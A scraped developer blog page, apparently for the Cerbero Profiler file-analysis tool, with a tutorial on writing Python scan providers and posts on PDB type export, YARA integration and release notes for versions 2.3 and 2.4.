<p>This feature required exposing a lot more of the SDK to Python and can’t be completely discussed in one post. This post is going to introduce the topic, while future posts will show real life examples.</p>
<p>Let’s start from the list of Python scan providers under Extensions -> Scan providers:</p>
<p><a href="/wp-content/uploads/2015/09/scanp/extlist.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/scanp/extlist.png" alt="Scan provider extensions"></a></p>
<p>This list is retrieved from the configuration file ‘scanp.cfg’. Here’s an example entry:</p>
<pre lang="ini">[TEST]
label = Test scan provider
ext = test2,test3
group = db
file = Test.py
allocator = allocator</pre>
<p>The name of the section has two purposes: it specifies the name of the format being supported (in this case ‘TEST’) and also the name of the extension which is automatically associated with that format (in this case ‘.test’, case insensitive). The hard limit for format names is 9 characters for now; this may change in the future if more are needed. The <strong>label</strong> is the description. The <strong>ext</strong> parameter is optional and specifies additional extensions to be associated with the format. <strong>group</strong> specifies the type of file which is being supported; available groups are: img, video, audio, doc, font, exe, manexe, arch, db, sys, cert, script.
<strong>file</strong> specifies the Python source file and <strong>allocator</strong> the function which returns a new instance of the scan provider class.</p>
<p>Let’s start with the allocator:</p>
<pre lang="python">def allocator():
    return TestScanProvider()</pre>
<p>It just returns a new instance of <strong>TestScanProvider</strong>, which is a class derived from <strong>ScanProvider</strong>:</p>
<pre lang="python">class TestScanProvider(ScanProvider):

    def __init__(self):
        super(TestScanProvider, self).__init__()
        self.obj = None</pre>
<p>Every scan provider has some mandatory methods it must override. Let’s begin with the first ones:</p>
<pre lang="python">    def _clear(self):
        self.obj = None

    def _getObject(self):
        return self.obj

    def _initObject(self):
        self.obj = TestObject()
        self.obj.Load(self.getStream())
        return self.SCAN_RESULT_OK</pre>
<p><strong>_clear</strong> gives a chance to free internal resources when they’re no longer used. In Python this is not usually important as member objects will automatically be freed when their reference count reaches zero.</p>
<p><strong>_getObject</strong> must return the internal instance of the object being parsed. This must return an instance of a <strong>CFFObject</strong> derived class.</p>
<p><strong>_initObject</strong> creates the object instance and loads the data stream into it. In the sample above we assume that loading succeeds. Otherwise, we would have to return <strong>SCAN_RESULT_ERROR</strong>. This method is not called by the main thread, so that it doesn’t block the UI during long parse operations.</p>
<p>Let’s take a look at the <strong>TestObject</strong> class:</p>
<pre lang="python">class TestObject(CFFObject):

    def __init__(self):
        super(TestObject, self).__init__()
        self.SetObjectFormatName("TEST")
        self.SetDefaultEndianness(ENDIANNESS_LITTLE)</pre>
<p>This is a minimalistic implementation of a <strong>CFFObject</strong> derived class.
Usually it should contain at least an override of the <strong>CustomLoad</strong> method, which gives the opportunity to fail when the data stream is first loaded through the <strong>Load</strong> method. <strong>SetDefaultEndianness</strong> wouldn’t even be necessary, as every object defaults to little endian. <strong>SetObjectFormatName</strong>, on the other hand, is very important, as it sets the internal format name of the object.</p>
<p>Let’s now take a look at how we scan a file:</p>
<pre lang="python">    def _startScan(self):
        return self.SCAN_RESULT_OK

    def _threadScan(self):
        e = ScanEntryData()
        e.category = SEC_Warn
        e.type = CT_NativeCode
        self.addEntry(e)</pre>
<p>The code above will issue a single warning concerning native code. When <strong>_startScan</strong> returns <strong>SCAN_RESULT_OK</strong>, <strong>_threadScan</strong> will be called from a thread other than the main UI one. The logic behind this is that <strong>_startScan</strong> is actually called from the main thread and if the scan of the file doesn’t require complex operations, like in the case above, then the method could return <strong>SCAN_RESULT_FINISHED</strong> and then <strong>_threadScan</strong> won’t be called at all. During a threaded scan, an abort by the user can be detected via the <strong>isAborted</strong> method.</p>
<p>From the UI point of view, when a scan entry is clicked in the summary, the scan provider is supposed to return UI information. </p>
<pre lang="python">    def _scanViewData(self, xml, dnode, sdata):
        if sdata.type == CT_NativeCode:
            sdata.setViews(SCANVIEW_TEXT)
            sdata.data.setData("Hello, world!")
            return True
        return False</pre>
<p>This will display a text field with a predefined content when the user clicks the scan entry in the summary. This is fairly easy, but what happens when we have several entries of the same type and need to differentiate between them?
This is where the <strong>data</strong> member of <strong>ScanEntryData</strong> plays a role: it is a string which will be included in the report XML and passed back to <strong>_scanViewData</strong> as an XML node.</p>
<p>For instance:</p>
<pre lang="python">e.data = "&lt;o&gt;1234&lt;/o&gt;"</pre>
<p>Becomes this in the final XML report:</p>
<pre lang="xml">&lt;d&gt;
    &lt;o&gt;1234&lt;/o&gt;
&lt;/d&gt;</pre>
<p>The <strong>dnode</strong> argument of <strong>_scanViewData</strong> points to the ‘d’ node and its first child will be the ‘o’ node we passed. The <strong>xml</strong> argument represents an instance of the <strong>NTXml</strong> class, which can be used to retrieve the children of the <strong>dnode</strong>.</p>
<p>But this is only half of the story: some of the scan entries may represent embedded files (category <strong>SEC_File</strong>), in which case the <strong>_scanViewData</strong> method must return the data representing the file.</p>
<p>Apart from scan entries, we may also want the user to explore the format of the file. To do that we must return a tree representing the structure of our file:</p>
<pre lang="python">    def _getFormat(self):
        ft = FormatTree()
        ft.enableIDs(True)
        fi = ft.appendChild(None, 1)
        ft.appendChild(fi, 2)
        return ft</pre>
<p>The <strong>enableIDs</strong> method must be called right after creating a new <strong>FormatTree</strong> instance. The code above creates a format item with id 1 with a child item with id 2, which results in the following:</p>
<p><a href="/wp-content/uploads/2015/09/scanp/format.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/scanp/format.png" alt="Format tree"></a></p>
<p>But of course, we have specified neither labels nor icons in the function above.
This information is retrieved for each item when required through the following method:</p>
<pre lang="python">    def _formatViewInfo(self, finfo):
        if finfo.fid == 1:
            finfo.text = "directory"
            finfo.icon = PubIcon_Dir
            return True
        elif finfo.fid == 2:
            finfo.text = "entry"
            return True
        return False</pre>
<p>The various items are identified by their id, which was specified during the creation of the tree.</p>
<p>The UI data for each item is retrieved through the <strong>_formatViewData</strong> method:</p>
<pre lang="python">    def _formatViewData(self, sdata):
        if sdata.fid == 1:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("&lt;ui&gt;&lt;hsplitter csizes='40-*'&gt;&lt;table id='1'/&gt;&lt;hex id='2'/&gt;&lt;/hsplitter&gt;&lt;/ui&gt;")
            sdata.setCallback(cb, None)
            return True
        return False</pre></div></article>
<p>This will display a custom view with a table and a hex view separated by a splitter:</p>
<p><a href="/wp-content/uploads/2015/09/scanp/cview.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/scanp/cview.png" alt="Custom view"></a></p>
<p>Of course, we have also specified the callback for our custom view:</p>
<pre lang="python">def cb(cv, ud, code, view, data):
    if code == pvnInit:
        return 1
    return 0</pre>
<p>It is good to remember that format item IDs and IDs used in custom views are used to encode bookmark jumps. So if they change, saved bookmark jumps become invalid.</p>
<p>And here is the whole code again for a better overview:</p>
<pre lang="python">from Pro.Core import *
from Pro.UI import pvnInit, PubIcon_Dir

class TestObject(CFFObject):

    def __init__(self):
        super(TestObject, self).__init__()
        self.SetObjectFormatName("TEST")
        self.SetDefaultEndianness(ENDIANNESS_LITTLE)

def cb(cv, ud, code, view, data):
    if code == pvnInit:
        return 1
    return 0

class TestScanProvider(ScanProvider):

    def __init__(self):
        super(TestScanProvider, self).__init__()
        self.obj = None

    def _clear(self):
        self.obj = None

    def _getObject(self):
        return self.obj

    def _initObject(self):
        self.obj = TestObject()
        self.obj.Load(self.getStream())
        return self.SCAN_RESULT_OK

    def _startScan(self):
        return self.SCAN_RESULT_OK

    def _threadScan(self):
        print("thread msg")
        e = ScanEntryData()
        e.category = SEC_Warn
        e.type = CT_NativeCode
        self.addEntry(e)

    def _scanViewData(self, xml, dnode, sdata):
        if sdata.type == CT_NativeCode:
            sdata.setViews(SCANVIEW_TEXT)
            sdata.data.setData("Hello, world!")
            return True
        return False

    def _getFormat(self):
        ft = FormatTree()
        ft.enableIDs(True)
        fi = ft.appendChild(None, 1)
        ft.appendChild(fi, 2)
        return ft

    def _formatViewInfo(self, finfo):
        if finfo.fid == 1:
            finfo.text = "directory"
            finfo.icon = PubIcon_Dir
            return True
        elif finfo.fid == 2:
            finfo.text = "entry"
            return True
        return False

    def _formatViewData(self, sdata):
        if sdata.fid == 1:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("&lt;ui&gt;&lt;hsplitter csizes='40-*'&gt;&lt;table id='1'/&gt;&lt;hex id='2'/&gt;&lt;/hsplitter&gt;&lt;/ui&gt;")
            sdata.setCallback(cb, None)
            return True
        return False

def allocator():
    return TestScanProvider()</pre>
<p>As you may have noticed in the screenshot above, the analysed file is called ‘a.t’ and as such isn’t automatically associated with our ‘test’ format. So how does it get associated anyway?</p>
<p>Clearly Profiler doesn’t rely on extensions alone to identify the format of a file.
For external scan providers a signature mechanism based on YARA has been introduced. In the <strong>config</strong> directory of the user, you can create a file named ‘yara.plain’ and insert your identification rules in it, e.g.:</p>
<pre lang="text">rule test
{
    strings:
        $sig = "test"

    condition:
        $sig at 0
}</pre>
<p>This rule will identify the format as ‘test’ if the first 4 bytes of the file match the string ‘test’: the name of the rule identifies the format.</p>
<p>The file ‘yara.plain’ will be compiled to the binary ‘yara.rules’ file at the first run. In order to refresh ‘yara.rules’, you must delete it.</p>
<p>One important thing to remember is that a rule isn’t matched against an entire file, but only against the first 512 bytes.</p>
<p>Of course, our provider behaves 100% like all other providers and can be used to load embedded files:</p>
<p><a href="/wp-content/uploads/2015/09/scanp/embfiles.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/scanp/embfiles.png" alt="Embedded files"></a></p>
<p>Our new provider is used automatically when an embedded file is identified as matching our format.</p><footer class="entry-footer"> <span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/scan-providers/" rel="bookmark"><time class="entry-date published" datetime="2015-09-21T22:13:50+00:00">September 21, 2015</time><time class="updated" 
datetime="2021-04-01T16:32:53+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="comments-link"><a href="https://blog.cerbero.io/scan-providers/#respond">Leave a comment<span class="screen-reader-text"> on Scan Providers</span></a></span> </footer> <article id="post-1539" class="post-1539 post type-post status-publish format-standard hentry category-suite-standard tag-command-line tag-news"> <header class="entry-header"> <h2 class="entry-title"><a href="https://blog.cerbero.io/profiler-2-4/" rel="bookmark">Profiler 2.4</a></h2> </header> <div class="entry-content"> <p>Profiler 2.4 is out with the following news:</p> <p>– <a href="/?p=1530">added initial support for PDB files (including export of types)</a><br> – <a href="#wscript">added support for Windows Encoded Scripts (VBE, JSE)</a><br> – introduced fixed XML structures<br> – <a href="#sdec">added automatic string decoding in struct tables</a><br> – <a href="#pyline">added Python string command line execution</a><br> – remember the last selected logic group<br> – fixed missing support for wchar_t in C types<br> – updated Qt to 5.4.1<br> – various bug fixes</p> <p>While the most important new feature is the support for PDB files, here are some other interesting additions:</p> <p><a name="wscript"></a></p> <h2>Support for Windows Encoded Scripts (VBE, JSE)</h2> <p>Windows encoded scripts like VBE and JSE files (the encoded variants of VBS and JS script files) are now supported and automatically decoded.</p> <p><a href="/wp-content/uploads/2015/06/24/wscript.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/24/wscript.png"></a></p> <p>In the screenshot you can see the decoded output of an encoded file (shown at the bottom).</p> <p><a name="sdec"></a></p> <h2>Automatic string decoding in struct 
tables</h2> <p>A very basic feature: byte arrays in structures are automatically checked for strings and, when one is found, decoded.</p> <p><a href="/wp-content/uploads/2015/06/24/sdec.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/24/sdec.png"></a></p> <p>(notice the section name automatically displayed as an ASCII string)</p> <p><a name="pyline"></a></p> <h2>Python string command line execution</h2> <p>Apart from <a href="/?p=1464">executing script files passed as command line arguments</a>, it is now also possible to execute Python statements passed directly as an argument. </p> <p>For instance:</p> <pre lang="text">cerpro -c -e "from Pro.Core import *;proCoreContext().msgBox(0, \"Hello world!\")"</pre> <p>The optional argument ‘-c’ tells Profiler not to display the UI.</p> <p>Enjoy!</p></div><footer class="entry-footer"> <span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/profiler-2-4/" rel="bookmark"><time class="entry-date published" datetime="2015-06-06T16:43:45+00:00">June 6, 2015</time><time class="updated" datetime="2021-04-01T16:33:35+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/command-line/" 
rel="tag">Command-line</a>, <a href="https://blog.cerbero.io/tag/news/" rel="tag">News</a></span><span class="comments-link"><a href="https://blog.cerbero.io/profiler-2-4/#respond">Leave a comment<span class="screen-reader-text"> on Profiler 2.4</span></a></span> </footer> </article> <article id="post-1530" class="post-1530 post type-post status-publish format-standard hentry category-suite-standard tag-headers tag-pdb tag-python tag-sdk"> <header class="entry-header"> <h2 class="entry-title"><a href="https://blog.cerbero.io/pdb-support-including-export-of-types/" rel="bookmark">PDB support (including export of types)</a></h2> </header> <div class="entry-content"> <p>The main feature of the upcoming 2.4 version of Profiler is the initial support for the PDB format. Our code doesn’t rely on the Microsoft DIA SDK and thus also works on OS X and Linux.</p> <p>Since the PDB format is undocumented, this task would’ve been extremely difficult without the <a href="http://undocumented.rawol.com/">fantastic work on PDBs</a> of Sven B. Schreiber, who can never be revered enough.</p> <p>Let’s open a PDB file.</p> <p><a href="/wp-content/uploads/2015/06/pdb/streams.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/streams.png"></a></p> <p>As you can see, the streams in the PDB can be explored. The TPI stream (the one describing types) offers further inspection.</p> <p><a href="/wp-content/uploads/2015/06/pdb/tpi.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/tpi.png"></a></p> <p>All the types contained in the PDB can be exported to a Profiler header by pressing Ctrl+R and executing the ‘Dump types to header’ action.</p> <p><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/action.png"></p> <p>Now the types can be used from both the hex editor and the Python SDK. 
</p> <p><a href="/wp-content/uploads/2015/06/pdb/hexed.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/hexed.png"></a></p> <p>We can explore the dumped header by using, as usual, the Header Manager tool.</p> <p><a href="/wp-content/uploads/2015/06/pdb/hdrmgr.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/hdrmgr.png"></a></p> <p>The type shown above in the hex editor is simple, so let’s look at what a more complex PDB type may look like.</p> <pre lang="xml">&lt;r id="CWnd" type="class" size="84"&gt;
  &lt;b&gt;
    &lt;b type="CCmdTarget" offset="0" access="public"/&gt;
  &lt;/b&gt;
  &lt;m id="_GetBaseClass" type="CRuntimeClass * ()"/&gt;
  &lt;s id="classCWnd" type="CRuntimeClass const"/&gt;
  &lt;m id="GetThisClass" type="CRuntimeClass * ()"/&gt;
  &lt;m id="GetRuntimeClass" type="CRuntimeClass * ()"/&gt;
  &lt;m id="CreateObject" type="CObject * ()"/&gt;
  &lt;m id="GetCurrentMessage" type="tagMSG const * ()"/&gt;
  &lt;f id="m_hWnd" type="HWND__ *" offset="32"/&gt;
  &lt;m id="operator struct HWND__ *" type="HWND__ * ()"/&gt;
  &lt;m id="operator==" type="int32 (CWnd const *)"/&gt;
  &lt;m id="operator!=" type="int32 (CWnd const *)"/&gt;
  &lt;m id="GetSafeHwnd" type="HWND__ * ()"/&gt;
  &lt;m id="GetStyle" type="unsigned int ()"/&gt;
  &lt;m id="GetExStyle" type="unsigned int ()"/&gt;
  &lt;m id="ModifyStyle" type="int32 (HWND__ *, unsigned int, unsigned int, uint32)"/&gt;
  &lt;m id="ModifyStyle" type="int32 (unsigned int, unsigned int, uint32)"/&gt;
  &lt;m id="ModifyStyleEx" type="int32 (HWND__ *, unsigned int, unsigned int, uint32)"/&gt;
  &lt;m id="ModifyStyleEx" type="int32 (unsigned int, unsigned int, uint32)"/&gt;
  &lt;m id="GetOwner" type="CWnd * ()"/&gt;
  &lt;m id="SetOwner" type="void (CWnd *)"/&gt;
  &lt;m id="GetWindowInfo" type="int32 (tagWINDOWINFO *)"/&gt;
  &lt;m id="GetTitleBarInfo" type="int32 (tagTITLEBARINFO *)"/&gt;
  &lt;m id="CWnd" type="void (CWnd const *)"/&gt;
  &lt;m id="CWnd" type="void (HWND__ *)"/&gt;
  &lt;m id="CWnd" type="void ()"/&gt;
  &lt;m id="FromHandle" type="CWnd * (HWND__ *)"/&gt;
  &lt;m id="FromHandlePermanent" type="CWnd * (HWND__ *)"/&gt;
  &lt;m id="DeleteTempMap" type="void ()"/&gt;
  &lt;!-- etc. --&gt;
&lt;/r&gt;</pre> <p>The PDB code is also exposed to the SDK. Here is a small snippet which dumps all the types to a text buffer and then displays them in a text view.</p> <pre lang="python">from Pro.Core import *
from Pro.UI import *
from Pro.PDB import *

def showPDBTypes():
    ctx = proContext()
    # text stream that receives the dumped types
    out = proTextStream()
    out.setIndentSize(4)
    # the PDB object of the file currently open in the workspace
    obj = ctx.currentScanProvider().getObject()
    # the TPI stream is the one describing types
    tpi = obj.GetStreamObject(PDB_STREAM_ID_TPI)
    tpihdr = obj.TPIHeader(tpi)
    tiMin = tpihdr.Num("tiMin")
    tiMax = tpihdr.Num("tiMax")
    tctx = obj.CreateTypeContext(tpi)
    # dump every type index in the range to the text stream
    for ti in range(tiMin, tiMax):
        tctx.DumpType(out, ti)
    # show the result in a text view with XML highlighting
    view = ctx.createView(ProView.Type_Text, "PDB Test")
    view.setLanguage("XML")
    view.setText(out.buffer)
    ctx.addView(view)

showPDBTypes()</pre> <p><a href="/wp-content/uploads/2015/06/pdb/pyresult.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/pyresult.png"></a></p> <p>In order to dump all types to a single header, you can use the <strong>DumpAllToHeader</strong> method.</p></div><footer class="entry-footer"><b><s id="classCWnd" type="CRuntimeClass const"> <span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/pdb-support-including-export-of-types/" rel="bookmark"><time class="entry-date published" 
datetime="2015-06-01T08:09:04+00:00">June 1, 2015</time><time class="updated" datetime="2021-04-01T16:34:10+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/headers/" rel="tag">Headers</a>, <a href="https://blog.cerbero.io/tag/pdb/" rel="tag">PDB</a>, <a href="https://blog.cerbero.io/tag/python/" rel="tag">Python</a>, <a href="https://blog.cerbero.io/tag/sdk/" rel="tag">SDK</a></span><span class="comments-link"><a href="https://blog.cerbero.io/pdb-support-including-export-of-types/#respond">Leave a comment<span class="screen-reader-text"> on PDB support (including export of types)</span></a></span> </s></b></footer><b><s id="classCWnd" type="CRuntimeClass const"> </s></b></article><b><s id="classCWnd" type="CRuntimeClass const"> <article id="post-1519" class="post-1519 post type-post status-publish format-standard hentry category-suite-standard tag-news"> <header class="entry-header"> <h2 class="entry-title"><a href="https://blog.cerbero.io/profiler-2-3/" rel="bookmark">Profiler 2.3</a></h2> </header> <div class="entry-content"> <p>Profiler 2.3 is out with the following news:</p> <p>– <a href="/?p=1506">introduced YARA 3.2 support</a><br> – <a href="#lgroups">added groups for logic providers</a><br> – <a href="#enctxt">added Python action to encode/decode text</a><br> – <a href="#x2t">added Python action to strip XML down to text</a><br> – <a href="#fixfont">added the possibility to choose the fixed font</a><br> – <a href="#colrand">added color randomization for structs and intervals</a><br> – <a href="#repapis">added close report and quit APIs</a><br> – <a href="#repapis">exposed more methods of the Report class (including save)</a><br> – improved indentation handling in the script editor<br> – 
<a href="#outsync">synchronized main and workspace output views</a><br> – improved output view<br> – updated libmagic to 5.21<br> – updated Capstone to 3.0<br> – many small improvements<br> – fixed libmagic on Linux<br> – removed the tray icon<br> – minor bug fixes</p> <p><a name="lgroups"></a></p> <h2>Logic provider groups</h2> <p>Logic providers can now be grouped in order to avoid clutter in the main window. Adding the following line to an existing logic provider will result in a new group being created:</p> <pre lang="python">group = Extra</pre> <p><a href="/wp-content/uploads/2014/12/23/lgroups.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/lgroups.png"></a></p> <p><a name="enctxt"></a></p> <h2>Encode/decode text action</h2> <p>A handy Python action to convert from hex to text and vice versa using all of Python’s supported encodings. Open a hex or text view and run the encoding/decoding action ‘Bytes to text’ or ‘Text to bytes’.</p> <p><a href="/wp-content/uploads/2014/12/23/enctext.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/enctext.png"></a></p> <p>The operation will open a new text or hex view depending on whether it was an encoding or a decoding. </p> <p><a name="x2t"></a></p> <h2>XML to text action</h2> <p>Strips tags from an XML document and displays only the text. The action can be performed on both hex and text views. </p> <p><a href="/wp-content/uploads/2014/12/23/x2t.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/x2t.png"></a></p> <p>The result opens in a new text view. This is useful to view the text of a DOCX or ODT document. 
In the future the preview for these documents will be made available automatically, but in the meantime this action is helpful.</p> <p><a href="/wp-content/uploads/2014/12/23/docxprev.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/docxprev.png"></a></p> <p><a name="fixfont"></a></p> <h2>Fixed font preferences</h2> <p>The fixed font used in most views can now be chosen from the ‘General’ settings.</p> <p><a name="colrand"></a></p> <h2>Struct/intervals color randomization</h2> <p>When adding a structure or interval to the hex view, the chosen color is now randomized every time the dialog shows up. This behaviour can be disabled from the dialog itself, and it’s also possible to randomize the color again by clicking the refresh button.</p> <p><a href="/wp-content/uploads/2014/12/23/colrand.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/colrand.png"></a></p> <p>Manually picking a different color for every interval is time-consuming, so this feature should speed up raw data analysis.</p> <p><a name="repapis"></a></p> <h2>Report APIs</h2> <p>Most of the report APIs have been exposed (check out the SDK documentation). Combined with the newly introduced ‘quit’ SDK method, they can be used to perform custom scans programmatically and save the resulting report.</p> <p>Here’s a small example which can be launched from the command line:</p> <pre lang="python">from Pro.Core import *
import sys

ctx = proCoreContext()

def init():
    # add the file passed on the command line to the scan
    ctx.getSystem().addFile(sys.argv[1])
    return True

def rload():
    # clean up, save the report and close the application
    ctx.unregisterLogicProvider("test_logic")
    ctx.getReport().saveAs("auto.cpro")
    ctx.quit()

ctx.registerLogicProvider("test_logic", init, None, None, None, rload)
ctx.startScan("test_logic")</pre> <p>The command line syntax to run this script would be:</p> <pre lang="text">cerpro -r scan.py [file to scan]</pre> <p>The UI will show up and close automatically once the ‘quit’ method is called. 
Running this script in console mode using the ‘-c’ parameter is not yet possible, because of the differences in message handling on different platforms, but it will be in the future.</p> <p><a name="outsync"></a></p> <h2>Synchronized output views</h2> <p>The output views of the main window and of the workspace are now synchronized, so important log messages printed in one context are no longer missed in the other.</p> <p>Enjoy!</p></div><footer class="entry-footer"> <span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/profiler-2-3/" rel="bookmark"><time class="entry-date published" datetime="2014-12-27T02:16:53+00:00">December 27, 2014</time><time class="updated" datetime="2021-04-01T16:34:49+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/news/" rel="tag">News</a></span><span class="comments-link"><a href="https://blog.cerbero.io/profiler-2-3/#respond">Leave a comment<span class="screen-reader-text"> on Profiler 2.3</span></a></span> </footer> </article> <article id="post-1506" class="post-1506 post type-post status-publish format-standard hentry category-action category-suite-standard tag-signatures tag-yara"> 
<header class="entry-header"> <h2 class="entry-title"><a href="https://blog.cerbero.io/yara-3-2-0-support/" rel="bookmark">YARA 3.2.0 support</a></h2> </header> <div class="entry-content"> <p>The upcoming 2.3 version of Profiler includes support for the latest YARA engine. This new release is scheduled for the first week of January and it will include YARA on all supported platforms.</p> <p>One inherent technical advantage of having YARA support in Profiler is that it will be possible to scan for YARA rules inside embedded files/objects, like files in a Zip archive, in a CHM file, in an OLEStream, streams in a PDF, etc.</p> <p>The YARA engine itself has been compiled with all standard modules (except for cuckoo). Even the <strong>magic</strong> module is available, since libmagic is also supported by Profiler.</p> <p>The initial YARA integration comes as a hook extension, an action and Python SDK support. The YARA Python support is the official one and differs from it only in the import statement. You can run existing YARA Python code without modification by using the following import syntax:</p> <pre lang="python">import Pro.yara as yara</pre> <p>So let’s start a YARA scan. To do that, we need to enable the YARA hook extension. On Windows remember to configure Python in case you haven’t yet, since all extensions have been written in it.</p> <p><a href="/wp-content/uploads/2014/12/yara/1.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/1.png"></a></p> <p>When a scan is started, a YARA settings dialog will show up. </p> <p><a href="/wp-content/uploads/2014/12/yara/2.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/2.png"></a></p> <p>This dialog lets us choose various settings including the type of rules to load.</p> <p><a href="/wp-content/uploads/2014/12/yara/3.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/3.png"></a></p> <p>There are four possibilities. 
A simple text field containing YARA rules, a plain text rules file, a compiled rules file or a custom expression which must <strong>eval</strong> to a valid <strong>Rules</strong> object.</p> <p>The report settings specify how we will be alerted to matches. The ‘only matches’ option makes sure that only files (or their sub-files) with a match will be included in the final report. The ‘add to meta-data’ option causes the matches to be visible as meta-data strings of a file. The ‘as threats’ option reports every match as a 100% risk threat. The ‘print to output’ option prints the matches to the output view.</p> <p>Since we had the ‘only matches’ option enabled, we will find only matching files in our final report.</p> <p><a href="/wp-content/uploads/2014/12/yara/4.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/4.png"></a></p> <p>And since we also had the ‘to meta-data’ option enabled, we will see the matches when opening a file in the workspace.</p> <p><a href="/wp-content/uploads/2014/12/yara/5.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/5.png"></a></p> <p>The YARA scan functionality is also available as an action in hex views. You can either scan the whole hex data or select a range. 
Then press Ctrl+R to run an action and select ‘YARA scan’.</p> <p><a href="/wp-content/uploads/2014/12/yara/6.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/6.png"></a></p> <p>In this case we won’t be given report options, since the only thing which can be performed is to print out matches in the output view.</p> <p><a href="/wp-content/uploads/2014/12/yara/7.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/7.png"></a></p> <p>Like this:</p> <p><a href="/wp-content/uploads/2014/12/yara/8.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/8.png"></a></p> <p>Of course, all supported platforms come also with the official YARA command line utility.</p> <p><a href="/wp-content/uploads/2014/12/yara/9.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/9.png"></a></p> <p>Since this has been a customer request for quite some time, I think it will be appreciated by some of our users.</p></div><footer class="entry-footer"> <span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a 